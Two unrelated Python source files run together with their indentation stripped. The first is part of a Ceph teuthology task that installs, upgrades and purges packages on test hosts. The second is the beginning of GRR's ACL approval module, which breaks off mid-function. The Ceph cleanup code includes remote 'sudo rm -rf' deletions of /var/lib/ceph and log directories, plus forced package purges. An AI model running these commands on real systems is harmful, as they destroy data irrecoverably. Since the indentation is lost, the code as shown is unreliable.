'test', '-d', '/var/lib/ceph',
run.Raw('&&'),
'sudo',
'find', '/var/lib/ceph',
'-mindepth', '1',
'-maxdepth', '2',
'-type', 'd',
'-exec', 'umount', '{}', ';',
run.Raw(';'),
'sudo',
'rm', '-rf', '--one-file-system', '--', '/var/lib/ceph',
])
def install_packages(ctx, pkgs, config):
"""
Installs packages on each remote in ctx.
:param ctx: the argparse.Namespace object
:param pkgs: list of packages names to install
:param config: the config dict
"""
install_pkgs = {
"deb": _update_deb_package_list_and_install,
"rpm": _update_rpm_package_list_and_install,
}
with parallel() as p:
for remote in ctx.cluster.remotes.iterkeys():
system_type = teuthology.get_system_type(remote)
p.spawn(
install_pkgs[system_type],
ctx, remote, pkgs[system_type], config)
#for remote in ctx.cluster.remotes.iterkeys():
# verifies that the install worked as expected
#verify_package_version(ctx, config, remote)
def _remove_deb(ctx, config, remote, debs):
"""
Removes Debian packages from remote, rudely
TODO: be less rude (e.g. using --force-yes)
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param debs: list of packages names to install
"""
log.info("Removing packages: {pkglist} on Debian system.".format(
pkglist=", ".join(debs)))
# first ask nicely
remote.run(
args=[
'for', 'd', 'in',
] + debs + [
run.Raw(';'),
'do',
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'), 'purge',
run.Raw('$d'),
run.Raw('||'),
'true',
run.Raw(';'),
'done',
])
# mop up anything that is broken
remote.run(
args=[
'dpkg', '-l',
run.Raw('|'),
'grep', '^.HR',
run.Raw('|'),
'awk', '{print $2}',
run.Raw('|'),
'sudo',
'xargs', '--no-run-if-empty',
'dpkg', '-P', '--force-remove-reinstreq',
])
# then let apt clean up
remote.run(
args=[
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'),
'autoremove',
],
)
def _remove_rpm(ctx, config, remote, rpm):
"""
Removes RPM packages from remote
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param rpm: list of packages names to remove
"""
log.info("Removing packages: {pkglist} on rpm system.".format(
pkglist=", ".join(rpm)))
baseparms = _get_baseurlinfo_and_dist(ctx, remote, config)
dist_release = baseparms['dist_release']
remote.run(
args=[
'for', 'd', 'in',
] + rpm + [
run.Raw(';'),
'do',
'sudo', 'yum', 'remove',
run.Raw('$d'),
'-y',
run.Raw('||'),
'true',
run.Raw(';'),
'done',
])
remote.run(
args=[
'sudo', 'yum', 'clean', 'all',
])
projRelease = '%s-release-%s.%s.noarch' % (
config.get('project', 'ceph'), RELEASE, dist_release)
remote.run(args=['sudo', 'yum', 'erase', projRelease, '-y'])
remote.run(
args=[
'sudo', 'yum', 'clean', 'expire-cache',
])
def remove_packages(ctx, config, pkgs):
"""
Removes packages from each remote in ctx.
:param ctx: the argparse.Namespace object
:param config: the config dict
:param pkgs: list of packages names to remove
"""
remove_pkgs = {
"deb": _remove_deb,
"rpm": _remove_rpm,
}
with parallel() as p:
for remote in ctx.cluster.remotes.iterkeys():
system_type = teuthology.get_system_type(remote)
p.spawn(remove_pkgs[
system_type], ctx, config, remote, pkgs[system_type])
def _remove_sources_list_deb(remote, proj):
"""
Removes /etc/apt/sources.list.d/{proj}.list and then runs ``apt-get
update``.
:param remote: the teuthology.orchestra.remote.Remote object
:param proj: the project whose sources.list needs removing
"""
remote.run(
args=[
'sudo', 'rm', '/etc/apt/sources.list.d/{proj}.list'.format(
proj=proj),
run.Raw('&&'),
'sudo', 'apt-get', 'update',
],
check_status=False,
)
def _remove_sources_list_rpm(remote, proj):
"""
Removes /etc/yum.repos.d/{proj}.repo, /var/lib/{proj}, and /var/log/{proj}
:param remote: the teuthology.orchestra.remote.Remote object
:param proj: the project whose .repo needs removing
"""
remote.run(
args=['sudo', 'rm', '/etc/yum.repos.d/{proj}.repo'.format(proj=proj)],
check_status=False,
)
# FIXME
# There probably should be a way of removing these files that is
# implemented in the yum/rpm remove procedures for the ceph package.
# FIXME but why is this function doing these things?
remote.run(
args=['sudo', 'rm', '-r', '/var/lib/{proj}'.format(proj=proj)],
check_status=False,
)
remote.run(
args=['sudo', 'rm', '-r', '/var/log/{proj}'.format(proj=proj)],
check_status=False,
)
_yum_unset_check_obsoletes(remote)
def remove_sources(ctx, config):
"""
Removes repo source files from each remote in ctx.
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
remove_sources_pkgs = {
'deb': _remove_sources_list_deb,
'rpm': _remove_sources_list_rpm,
}
with parallel() as p:
project = config.get('project', 'ceph')
log.info("Removing {proj} sources lists".format(
proj=project))
for remote in ctx.cluster.remotes.iterkeys():
remove_fn = remove_sources_pkgs[remote.os.package_type]
p.spawn(remove_fn, remote, project)
with parallel() as p:
project = 'calamari'
log.info("Removing {proj} sources lists".format(
proj=project))
for remote in ctx.cluster.remotes.iterkeys():
remove_fn = remove_sources_pkgs[remote.os.package_type]
p.spawn(remove_fn, remote, project)
@contextlib.contextmanager
def install(ctx, config):
"""
The install task. Installs packages for a given project on all hosts in
ctx. May work for projects besides ceph, but may not. Patches welcomed!
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
project = config.get('project', 'ceph')
debs = PACKAGES.get(project, {}).get('deb', [])
rpm = PACKAGES.get(project, {}).get('rpm', [])
# pull any additional packages out of config
    extra_pkgs = config.get('extra_packages', [])
log.info('extra packages: {packages}'.format(packages=extra_pkgs))
debs += extra_pkgs
rpm += extra_pkgs
# When extras is in the config we want to purposely not install ceph.
# This is typically used on jobs that use ceph-deploy to install ceph
# or when we are testing ceph-deploy directly. The packages being
# installed are needed to properly test ceph as ceph-deploy won't
# install these. 'extras' might not be the best name for this.
extras = config.get('extras')
if extras is not None:
# debs = ['ceph-test', 'ceph-test-dbg', 'ceph-fuse', 'ceph-fuse-dbg',
# 'librados2', 'librados2-dbg', 'librbd1', 'librbd1-dbg',
debs = ['ceph-test', 'ceph-fuse',
'librados2', 'librbd1',
'python-ceph']
rpm = ['ceph-fuse', 'librbd1', 'librados2', 'ceph-test', 'python-ceph']
# install lib deps (so we explicitly specify version), but do not
# uninstall them, as other packages depend on them (e.g., kvm)
# TODO: these can probably be removed as these packages are now included
# in PACKAGES. We've found that not uninstalling them each run can
# sometimes cause a baremetal machine to end up in a weird state so
# they were included in PACKAGES to ensure that nuke cleans them up.
proj_install_debs = {'ceph': [
'librados2',
# 'librados2-dbg',
'librbd1',
# 'librbd1-dbg',
]}
proj_install_rpm = {'ceph': [
'librbd1',
'librados2',
]}
install_debs = proj_install_debs.get(project, [])
install_rpm = proj_install_rpm.get(project, [])
# TODO: see previous todo comment. The install_debs and install_rpm
# part can and should be removed eventually as those packages are now
# present in PACKAGES.
install_info = {
"deb": debs + install_debs,
"rpm": rpm + install_rpm}
remove_info = {
"deb": debs,
"rpm": rpm}
install_packages(ctx, install_info, config)
try:
yield
finally:
remove_packages(ctx, config, remove_info)
remove_sources(ctx, config)
if project == 'ceph':
purge_data(ctx)
def _upgrade_deb_packages(ctx, config, remote, debs):
"""
Upgrade project's packages on remote Debian host
Before doing so, installs the project's GPG key, writes a sources.list
file, and runs ``apt-get update``.
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param debs: the Debian packages to be installed
"""
# check for ceph release key
r = remote.run(
args=[
'sudo', 'apt-key', 'list', run.Raw('|'), 'grep', 'Ceph',
],
stdout=StringIO(),
check_status=False,
)
if r.stdout.getvalue().find('Ceph automated package') == -1:
# if it doesn't exist, add it
remote.run(
args=[
'wget', '-q', '-O-',
'https://ceph.com/git/?p=ceph.git;a=blob_plain;f=keys/autobuild.asc',
run.Raw('|'),
'sudo', 'apt-key', 'add', '-',
],
stdout=StringIO(),
)
# get distro name and arch
r = remote.run(
args=['lsb_release', '-sc'],
stdout=StringIO(),
)
dist = r.stdout.getvalue().strip()
r = remote.run(
args=['arch'],
stdout=StringIO(),
)
arch = r.stdout.getvalue().strip()
log.info("dist %s arch %s", dist, arch)
# branch/tag/sha1 flavor
flavor = 'basic'
sha1 = config.get('sha1')
branch = config.get('branch')
tag = config.get('tag')
uri = _get_uri(tag, branch, sha1)
base_url = 'http://{host}/{proj}-deb-{dist}-{arch}-{flavor}/{uri}'.format(
host=teuth_config.gitbuilder_host,
proj=config.get('project', 'ceph'),
dist=dist,
arch=arch,
flavor=flavor,
uri=uri,
)
log.info('Pulling from %s', base_url)
# get package version string
while True:
r = remote.run(
args=[
'wget', '-q', '-O-', base_url + '/version',
],
stdout=StringIO(),
check_status=False,
)
if r.exitstatus != 0:
if config.get('wait_for_package'):
log.info('Package not there yet, waiting...')
time.sleep(15)
continue
raise VersionNotFoundError("%s/version" % base_url)
version = r.stdout.getvalue().strip()
log.info('Package version is %s', version)
break
remote.run(
args=[
'echo', 'deb', base_url, dist, 'main',
run.Raw('|'),
'sudo', 'tee', '/etc/apt/sources.list.d/{proj}.list'.format(
proj=config.get('project', 'ceph')),
],
stdout=StringIO(),
)
remote.run(args=['sudo', 'apt-get', 'update'], check_status=False)
remote.run(
args=[
'sudo', 'DEBIAN_FRONTEND=noninteractive', 'apt-get', '-y', '--force-yes',
'-o', run.Raw('Dpkg::Options::="--force-confdef"'), '-o', run.Raw(
'Dpkg::Options::="--force-confold"'),
'install',
] + ['%s=%s' % (d, version) for d in debs],
)
def _upgrade_rpm_packages(ctx, config, remote, pkgs):
"""
Upgrade project's packages on remote RPM-based host
Before doing so, it makes sure the project's -release RPM is installed -
removing any previous version first.
:param ctx: the argparse.Namespace object
:param config: the config dict
:param remote: the teuthology.orchestra.remote.Remote object
:param pkgs: the RPM packages to be installed
"""
distinfo = _get_baseurlinfo_and_dist(ctx, remote, config)
log.info(
"Host {host} is: {distro} {ver} {arch}".format(
host=remote.shortname,
distro=distinfo['distro'],
ver=distinfo['relval'],
arch=distinfo['arch'],)
)
base_url = _get_baseurl(ctx, remote, config)
log.info('Repo base URL: %s', base_url)
project = config.get('project', 'ceph')
# Remove the -release package before upgrading it
args = ['sudo', 'rpm', '-ev', '%s-release' % project]
remote.run(args=args)
# Build the new -release package path
release_rpm = "{base}/noarch/{proj}-release-{release}.{dist_release}.noarch.rpm".format(
base=base_url,
proj=project,
release=RELEASE,
dist_release=distinfo['dist_release'],
)
# Upgrade the -release package
args = ['sudo', 'rpm', '-Uv', release_rpm]
remote.run(args=args)
    uri = distinfo['uri']
_yum_fix_repo_priority(remote, project, uri)
_yum_fix_repo_host(remote, project)
_yum_set_check_obsoletes(remote)
remote.run(
args=[
'sudo', 'yum', 'clean', 'all',
])
# Actually upgrade the project packages
args = ['sudo', 'yum', '-y', 'install']
args += pkgs
remote.run(args=args)
def upgrade_old_style(ctx, node, remote, pkgs, system_type):
"""
Handle the upgrade using methods in use prior to ceph-deploy.
"""
if system_type == 'deb':
_upgrade_deb_packages(ctx, node, remote, pkgs)
elif system_type == 'rpm':
_upgrade_rpm_packages(ctx, node, remote, pkgs)
def upgrade_with_ceph_deploy(ctx, node, remote, pkgs, sys_type):
"""
Upgrade using ceph-deploy
"""
dev_table = ['branch', 'tag', 'dev']
ceph_dev_parm = ''
ceph_rel_parm = ''
for entry in node.keys():
if entry in dev_table:
ceph_dev_parm = node[entry]
if entry == 'release':
ceph_rel_parm = node[entry]
params = []
if ceph_dev_parm:
params += ['--dev', ceph_dev_parm]
if ceph_rel_parm:
params += ['--release', ceph_rel_parm]
params.append(remote.name)
subprocess.call(['ceph-deploy', 'install'] + params)
remote.run(args=['sudo', 'restart', 'ceph-all'])
def upgrade_common(ctx, config, deploy_style):
"""
Common code for upgrading
"""
assert config is None or isinstance(config, dict), \
"install.upgrade only supports a dictionary for configuration"
config = config or {}
project = config.get('project', 'ceph')
# use 'install' overrides here, in case the upgrade target is left
# unspecified/implicit.
install_overrides = ctx.config.get(
'overrides', {}).get('install', {}).get(project, {})
log.info('project %s config %s overrides %s', project, config,
install_overrides)
# FIXME: extra_pkgs is not distro-agnostic
extra_pkgs = config.get('extra_packages', [])
log.info('extra packages: {packages}'.format(packages=extra_pkgs))
# build a normalized remote -> config dict
remotes = {}
if 'all' in config:
for remote in ctx.cluster.remotes.iterkeys():
remotes[remote] = config.get('all')
else:
for role in config.keys():
remotes_dict = ctx.cluster.only(role).remotes
if not remotes_dict:
# This is a regular config argument, not a role
continue
remote = remotes_dict.keys()[0]
if remote in remotes:
log.warn('remote %s came up twice (role %s)', remote, role)
continue
remotes[remote] = config.get(role)
for remote, node in remotes.iteritems():
if not node:
node = {}
this_overrides = copy.deepcopy(install_overrides)
if 'sha1' in node or 'tag' in node or 'branch' in node:
log.info('config contains sha1|tag|branch, removing those keys from override')
this_overrides.pop('sha1', None)
this_overrides.pop('tag', None)
this_overrides.pop('branch', None)
teuthology.deep_merge(node, this_overrides)
log.info('remote %s config %s', remote, node)
system_type = teuthology.get_system_type(remote)
assert system_type in ('deb', 'rpm')
pkgs = PACKAGES[project][system_type]
excluded_packages = config.get('exclude_packages', list())
pkgs = list(set(pkgs).difference(set(excluded_packages)))
log.info("Upgrading {proj} {system_type} packages: {pkgs}".format(
proj=project, system_type=system_type, pkgs=', '.join(pkgs)))
# FIXME: again, make extra_pkgs distro-agnostic
pkgs += extra_pkgs
node['project'] = project
deploy_style(ctx, node, remote, pkgs, system_type)
#verify_package_version(ctx, node, remote)
docstring_for_upgrade = """
Upgrades packages for a given project.
For example::
tasks:
- install.{cmd_parameter}:
all:
branch: end
or specify specific roles::
tasks:
- install.{cmd_parameter}:
mon.a:
branch: end
osd.0:
branch: other
or rely on the overrides for the target version::
overrides:
install:
ceph:
sha1: ...
tasks:
- install.{cmd_parameter}:
all:
(HACK: the overrides will *only* apply the sha1/branch/tag if those
keys are not present in the config.)
It is also possible to attempt to exclude packages from the upgrade set:
tasks:
- install.{cmd_parameter}:
exclude_packages: ['ceph-test', 'ceph-test-dbg']
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
#
# __doc__ strings for upgrade and ceph_deploy_upgrade are set from
# the same string so that help(upgrade) and help(ceph_deploy_upgrade)
# look the same.
#
@contextlib.contextmanager
def upgrade(ctx, config):
upgrade_common(ctx, config, upgrade_old_style)
yield
upgrade.__doc__ = docstring_for_upgrade.format(cmd_parameter='upgrade')
@contextlib.contextmanager
def ceph_deploy_upgrade(ctx, config):
upgrade_common(ctx, config, upgrade_with_ceph_deploy)
yield
ceph_deploy_upgrade.__doc__ = docstring_for_upgrade.format(
cmd_parameter='ceph_deploy_upgrade')
@contextlib.contextmanager
def ship_utilities(ctx, config):
"""
Write a copy of valgrind.supp to each of the remote sites. Set executables used
by Ceph in /usr/bin. When finished (upon exit of the teuthology run), remove
these files.
:param ctx: Context
:param config: Configuration
"""
assert config is None
testdir = teuthology.get_testdir(ctx)
filenames = []
log.info('Shipping valgrind.supp...')
with open(os.path.join(os.path.dirname(__file__), 'valgrind.supp'), 'rb') as f:
fn = os.path.join(testdir, 'valgrind.supp')
filenames.append(fn)
for rem in ctx.cluster.remotes.iterkeys():
teuthology.sudo_write_file(
remote=rem,
path=fn,
data=f,
)
f.seek(0)
FILES = ['daemon-helper', 'adjust-ulimits']
destdir = '/usr/bin'
for filename in FILES:
log.info('Shipping %r...', filename)
src = os.path.join(os.path.dirname(__file__), filename)
dst = os.path.join(destdir, filename)
filenames.append(dst)
with open(src, 'rb') as f:
for rem in ctx.cluster.remotes.iterkeys():
teuthology.sudo_write_file(
remote=rem,
path=dst,
data=f,
)
f.seek(0)
rem.run(
args=[
'sudo',
'chmod',
'a=rx',
'--',
dst,
],
)
try:
yield
finally:
log.info('Removing shipped files: %s...', ' '.join(filenames))
run.wait(
ctx.cluster.run(
args=[
'sudo',
'rm',
'-f',
'--',
] + list(filenames),
wait=False,
),
)
@contextlib.contextmanager
def task(ctx, config):
"""
Install packages for a given project.
tasks:
- install:
project: ceph
branch: bar
- install:
project: samba
branch: foo
extra_packages: ['samba']
Overrides are project specific:
overrides:
install:
ceph:
sha1: ...
:param ctx: the argparse.Namespace object
:param config: the config dict
"""
if config is None:
config = {}
assert isinstance(config, dict), \
"task install only supports a dictionary for configuration"
project = config.get('project', 'ceph')
log.debug('project %s' % project)
overrides = ctx.config.get('overrides')
if overrides:
install_overrides = overrides.get('install', {})
teuthology.deep_merge(config, install_overrides.get(project, {}))
log.debug('config %s' % config)
# Flavor tells us what gitbuilder to fetch the prebuilt software
# from. It's a combination of possible keywords, in a specific
# order, joined by dashes. It is used as a URL path name. If a
# match is not found, the teuthology run fails. This is ugly,
# and should be cleaned up at some point.
flavor = config.get('flavor', 'basic')
if config.get('path'):
# local dir precludes any other flavors
flavor = 'local'
else:
if config.get('valgrind'):
log.info(
'Using notcmalloc flavor and running some daemons under valgrind')
flavor = 'notcmalloc'
else:
if config.get('coverage'):
log.info('Recording coverage for this run.')
flavor = 'gcov'
ctx.summary['flavor'] = flavor
with contextutil.nested(
lambda: install(ctx=ctx, config=dict(
branch=config.get('branch'),
tag=config.get('tag'),
sha1=config.get('sha1'),
flavor=flavor,
extra_packages=config.get('extra_packages', []),
extras=config.get('extras', None),
wait_for_package=ctx.config.get('wait_for_package', False),
project=project,
)),
lambda: ship_utilities(ctx=ctx, config=None),
):
yield
|
|
#!/usr/bin/env python
"""AFF4 Objects to enforce ACL policies."""
import email
import urllib
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import email_alerts
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import utils
from grr.proto import flows_pb2
class Approval(aff4.AFF4Object):
"""An abstract approval request object.
This object normally lives within the namespace:
aff4:/ACL/...
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object.
"""
class SchemaCls(aff4.AFF4Object.SchemaCls):
"""The Schema for the Approval class."""
APPROVER = aff4.Attribute("aff4:approval/approver", rdfvalue.RDFString,
"An approver for the request.", "approver")
REASON = aff4.Attribute("aff4:approval/reason",
rdfvalue.RDFString,
"The reason for requesting access to this client.")
EMAIL_MSG_ID = aff4.Attribute("aff4:approval/email_msg_id",
rdfvalue.RDFString,
"The email thread message ID for this "
"approval. Storing this allows for "
"conversation threading.")
def CheckAccess(self, token):
"""Check that this approval applies to the given token.
Args:
token: User's credentials token.
Returns:
True if access is granted, raises access_control.UnauthorizedAccess
otherwise.
Raises:
access_control.UnauthorizedAccess: if access is rejected.
"""
_ = token
raise NotImplementedError()
@staticmethod
def GetApprovalForObject(object_urn, token=None, username=""):
"""Looks for approvals for an object and returns available valid tokens.
Args:
object_urn: Urn of the object we want access to.
token: The token to use to lookup the ACLs.
username: The user to get the approval for; if empty, it is taken from
the token.
Returns:
A token for access to the object on success, otherwise raises.
Raises:
UnauthorizedAccess: If there are no valid approvals available.
"""
if token is None:
raise access_control.UnauthorizedAccess(
"No token given, cannot authenticate.")
if not username:
username = token.username
approval_urn = aff4.ROOT_URN.Add("ACL").Add(object_urn.Path()).Add(
username)
error = "No approvals available"
fd = aff4.FACTORY.Open(approval_urn, mode="r", token=token)
for auth_request in fd.OpenChildren():
try:
reason = utils.DecodeReasonString(auth_request.urn.Basename())
except TypeError:
continue
# Check authorization using the data_store for an authoritative source.
test_token = access_control.ACLToken(username=username, reason=reason)
try:
# TODO(user): stop making assumptions about URNs
if object_urn.Split()[0] == "cron":
# Checking that we can access the cron job
flow.GRRFlow.StartFlow(flow_name="ManageCronJobFlow",
token=test_token, urn=object_urn)
elif object_urn.Split()[0] == "hunts":
# Checking that we can access the hunt
flow.GRRFlow.StartFlow(flow_name="CheckHuntAccessFlow",
token=test_token, hunt_urn=object_urn)
else:
# Check if we can access a non-existent path under this one.
aff4.FACTORY.Open(rdfvalue.RDFURN(object_urn).Add("acl_chk"),
mode="r", token=test_token)
return test_token
except access_control.UnauthorizedAccess as e:
error = e
# We tried all auth_requests, but got no usable results.
raise access_control.UnauthorizedAccess(
error, subject=object_urn)
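# Usage sketch (names here are hypothetical): a caller holding a user token can
# ask for a vetted token before touching a protected object, e.g.:
#   client_urn = rdfvalue.ClientURN("C.1234567890abcdef")
#   approved_token = Approval.GetApprovalForObject(client_urn, token=user_token)
# which raises access_control.UnauthorizedAccess if no valid approval exists.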
class ApprovalWithApproversAndReason(Approval):
"""Generic all-purpose base approval class.
This object normally lives within the aff4:/ACL namespace. Reason and username
are encoded into this object's urn. Subject's urn (i.e. urn of the object
which this approval corresponds to) can also be inferred from this approval's
urn.
This class provides the following functionality:
* Number of approvers configured by ACL.approvers_required configuration
parameter is required for this approval's CheckAccess() to succeed.
* An optional checked_approvers_label attribute may be specified. In that
case, at least min_approvers_with_label of the approvers must carry the
checked_approvers_label label for CheckAccess() to succeed.
* Break-glass functionality. If this approval's BREAK_GLASS attribute is
set, user's token is marked as emergency token and CheckAccess() returns
True.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows.
"""
checked_approvers_label = None
min_approvers_with_label = 1
class SchemaCls(Approval.SchemaCls):
"""The Schema for the ClientAccessApproval class."""
LIFETIME = aff4.Attribute(
"aff4:approval/lifetime", rdfvalue.RDFInteger,
"The number of microseconds an approval is valid for.",
default=4 * 7 * 24 * 60 * 60 * 1000000) # 4 weeks
BREAK_GLASS = aff4.Attribute(
"aff4:approval/breakglass", rdfvalue.RDFDatetime,
"The date when this break glass approval will expire.")
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn.
Returns:
(username, subject_urn) tuple.
"""
raise NotImplementedError()
def CheckAccess(self, token):
"""Enforce a dual approver policy for access."""
namespace, _ = self.urn.Split(2)
if namespace != "ACL":
raise access_control.UnauthorizedAccess(
"Approval object has invalid urn %s." % self.urn,
subject=self.urn, requested_access=token.requested_access)
user, subject_urn = self.InferUserAndSubjectFromUrn()
if user != token.username:
raise access_control.UnauthorizedAccess(
"Approval object is not for user %s." % token.username,
subject=self.urn, requested_access=token.requested_access)
now = rdfvalue.RDFDatetime().Now()
# Is this an emergency access?
break_glass = self.Get(self.Schema.BREAK_GLASS)
if break_glass and now < break_glass:
# This tags the token as an emergency token.
token.is_emergency = True
return True
# Check that there are enough approvers.
lifetime = self.Get(self.Schema.LIFETIME)
approvers = set()
for approver in self.GetValuesForAttribute(self.Schema.APPROVER):
if approver.age + lifetime > now:
approvers.add(utils.SmartStr(approver))
if len(approvers) < config_lib.CONFIG["ACL.approvers_required"]:
raise access_control.UnauthorizedAccess(
("Requires %s approvers for access." %
config_lib.CONFIG["ACL.approvers_required"]),
subject=subject_urn,
requested_access=token.requested_access)
if self.checked_approvers_label:
approvers_with_label = []
# We need to check labels with high privilege since normal users can
# inspect other user's labels.
for approver in approvers:
try:
data_store.DB.security_manager.CheckUserLabels(
approver, [self.checked_approvers_label], token=token.SetUID())
approvers_with_label.append(approver)
except access_control.UnauthorizedAccess:
pass
if len(approvers_with_label) < self.min_approvers_with_label:
raise access_control.UnauthorizedAccess(
"At least %d approver(s) should have the '%s' label." % (
self.min_approvers_with_label,
self.checked_approvers_label),
subject=subject_urn,
requested_access=token.requested_access)
return True
class ClientApproval(ApprovalWithApproversAndReason):
"""An approval request for access to a specific client.
This object normally lives within the namespace:
aff4:/ACL/client_id/user/<utils.EncodeReasonString(reason)>
Hence the client_id and the user who is granted access are inferred from
this object's URN.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object:
- RequestClientApprovalFlow()
- GrantClientApprovalFlow()
- BreakGlassGrantClientApprovalFlow()
"""
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn."""
_, client_id, user, _ = self.urn.Split(4)
return (user, rdfvalue.ClientURN(client_id))
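# Illustrative example (hypothetical ids): for an approval urn such as
# aff4:/ACL/C.1234567890abcdef/joe/<encoded reason>, Split(4) yields
# ('ACL', 'C.1234567890abcdef', 'joe', '<encoded reason>'), so the user is
# 'joe' and the subject is client C.1234567890abcdef.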
class HuntApproval(ApprovalWithApproversAndReason):
"""An approval request for running a specific hunt.
This object normally lives within the namespace:
aff4:/ACL/hunts/hunt_id/user_id/<utils.EncodeReasonString(reason)>
Hence the hunt_id and user_id are inferred from this object's URN.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object:
- RequestHuntApprovalFlow()
- GrantHuntApprovalFlow()
"""
checked_approvers_label = "admin"
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn."""
_, hunts_str, hunt_id, user, _ = self.urn.Split(5)
if hunts_str != "hunts":
raise access_control.UnauthorizedAccess(
"Approval object has invalid urn %s." % self.urn,
requested_access=self.token.requested_access)
return (user, aff4.ROOT_URN.Add("hunts").Add(hunt_id))
class CronJobApproval(ApprovalWithApproversAndReason):
"""An approval request for managing a specific cron job.
This object normally lives within the namespace:
aff4:/ACL/cron/cron_job_id/user_id/<utils.EncodeReasonString(reason)>
Hence the cron_job_id and user_id are inferred from this object's URN.
The aff4:/ACL namespace is not writable by users, hence all manipulation of
this object must be done via dedicated flows. These flows use the server's
access credentials for manipulating this object:
- RequestCronJobApprovalFlow()
- GrantCronJobApprovalFlow()
"""
checked_approvers_label = "admin"
def InferUserAndSubjectFromUrn(self):
"""Infers user name and subject urn from self.urn."""
_, cron_str, cron_job_name, user, _ = self.urn.Split(5)
if cron_str != "cron":
raise access_control.UnauthorizedAccess(
"Approval object has invalid urn %s." % self.urn,
requested_access=self.token.requested_access)
return (user, aff4.ROOT_URN.Add("cron").Add(cron_job_name))
class RequestApprovalWithReasonFlowArgs(rdfvalue.RDFProtoStruct):
protobuf = flows_pb2.RequestApprovalWithReasonFlowArgs
class RequestApprovalWithReasonFlow(flow.GRRFlow):
"""Base flow class for flows that request approval of a certain type."""
args_type = RequestApprovalWithReasonFlowArgs
approval_type = None
def BuildApprovalUrn(self):
"""Builds approval object urn."""
raise NotImplementedError()
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
raise NotImplementedError()
@classmethod
def ApprovalUrnBuilder(cls, subject, user, reason):
"""Encode an approval URN."""
return aff4.ROOT_URN.Add("ACL").Add(
subject).Add(user).Add(utils.EncodeReasonString(reason))
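# Illustrative example (hypothetical values):
#   ApprovalUrnBuilder("C.1234567890abcdef", "joe", "case 42")
# yields roughly aff4:/ACL/C.1234567890abcdef/joe/<encoded "case 42">,
# with the reason encoded by utils.EncodeReasonString.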
@flow.StateHandler()
def Start(self):
"""Create the Approval object and notify the Approval Granter."""
approval_urn = self.BuildApprovalUrn()
subject_title = self.BuildSubjectTitle()
email_msg_id = email.utils.make_msgid()
approval_request = aff4.FACTORY.Create(approval_urn, self.approval_type,
mode="w", token=self.token)
approval_request.Set(approval_request.Schema.REASON(self.args.reason))
approval_request.Set(approval_request.Schema.EMAIL_MSG_ID(email_msg_id))
# We add ourselves as an approver as well (The requirement is that we have 2
# approvers, so the requester is automatically an approver).
approval_request.AddAttribute(
approval_request.Schema.APPROVER(self.token.username))
approval_request.Close()
# Notify the users.
for user in self.args.approver.split(","):
user = user.strip()
fd = aff4.FACTORY.Create(aff4.ROOT_URN.Add("users").Add(user),
"GRRUser", mode="rw", token=self.token)
fd.Notify("GrantAccess", approval_urn,
"Please grant access to %s" % subject_title, self.session_id)
fd.Close()
template = u"""
<html><body><h1>Approval to access %(subject_title)s requested.</h1>
The user "%(username)s" has requested access to %(subject_title)s
for the purpose of "%(reason)s".
Please click <a href='%(admin_ui)s#%(approval_urn)s'>
here
</a> to review this request and then grant access.
<p>Thanks,</p>
<p>%(signature)s</p>
<p>%(image)s</p>
</body></html>"""
# If you feel like it, add a funny cat picture here :)
image = ""
url = urllib.urlencode((("acl", utils.SmartStr(approval_urn)),
("main", "GrantAccess")))
body = template % dict(
username=self.token.username,
reason=self.args.reason,
admin_ui=config_lib.CONFIG["AdminUI.url"],
subject_title=subject_title,
approval_urn=url,
image=image,
signature=config_lib.CONFIG["Email.signature"])
email_alerts.SendEmail(user, utils.SmartStr(self.token.username),
u"Approval for %s to access %s." % (
self.token.username, subject_title),
utils.SmartStr(body), is_html=True,
cc_addresses=config_lib.CONFIG[
"Email.approval_cc_address"],
message_id=email_msg_id)
class GrantApprovalWithReasonFlowArgs(rdfvalue.RDFProtoStruct):
protobuf = flows_pb2.GrantApprovalWithReasonFlowArgs
class GrantApprovalWithReasonFlow(flow.GRRFlow):
"""Base flow class for flows that grant approval of a certain type."""
args_type = GrantApprovalWithReasonFlowArgs
def BuildApprovalUrn(self):
"""Builds approval object urn."""
raise NotImplementedError()
def BuildSubjectTitle(self):
"""Returns the string with subject's title."""
raise NotImplementedError()
def BuildAccessUrl(self):
"""Builds the urn to access this object."""
raise NotImplementedError()
@classmethod
def ApprovalUrnBuilder(cls, subject, user, reason):
"""Encode an approval URN."""
return RequestApprovalWithReasonFlow.ApprovalUrnBuilder(subject, user,
reason)
@flow.StateHandler()
def Start(self):
"""Create the Approval object and notify the Approval Granter."""
approval_urn = self.BuildApprovalUrn()
subject_title = self.BuildSubjectTitle()
access_urn = self.BuildAccessUrl()
# This object must already exist.
try:
approval_request = aff4.FACTORY.Open(approval_urn, mode="rw",
aff4_type=self.approval_type,
token=self.token)
except IOError:
raise access_control.UnauthorizedAccess("Approval object does not exist.",
requested_access="rw")
# We are now an approver for this request.
approval_request.AddAttribute(
approval_request.Schema.APPROVER(self.token.username))
email_msg_id = utils.SmartStr(approval_request.Get(
approval_request.Schema.EMAIL_MSG_ID))
approval_request.Close(sync=True)
# Notify the user.
